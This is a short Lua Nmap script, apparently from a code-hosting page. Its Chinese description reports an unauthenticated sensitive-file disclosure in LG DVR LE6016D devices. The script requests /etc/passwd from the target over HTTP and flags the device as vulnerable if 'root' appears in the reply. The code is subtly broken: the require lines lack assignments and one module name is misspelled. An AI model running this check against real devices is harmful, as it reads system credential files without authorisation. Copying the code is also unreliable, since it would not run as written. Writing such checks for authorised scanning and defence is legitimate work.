35 lines
769 B
Lua
35 lines
769 B
Lua
local http require "http"
|
||
local string require "string"
|
||
local stdnse require "stdnse"
|
||
local shortport require "shorport"
|
||
|
||
|
||
description = [[
|
||
Desc:LG DVR LE6016D存在敏感信息泄露漏洞,
|
||
未认证用户只需要发起一个请求链接即可访问系统敏感文件,
|
||
如/etc/passwd, /etc/shadow
|
||
Tested:LG DVR LE6016D
|
||
]]
|
||
|
||
|
||
author = "seaung"
|
||
|
||
|
||
portrule = shortport.http
|
||
|
||
action = function(host, port)
|
||
local output = stdnse.output_table()
|
||
local url = "/etc/passwd"
|
||
local response = http.get(host, port, url)
|
||
|
||
if response.status == 200 then
|
||
if string.find(response.body, "root") ~= nil then
|
||
output = "[+] Found vulnerable."
|
||
else
|
||
output = "[-] Not Found vulnerable."
|
||
end
|
||
end
|
||
return output
|
||
end
|
||
|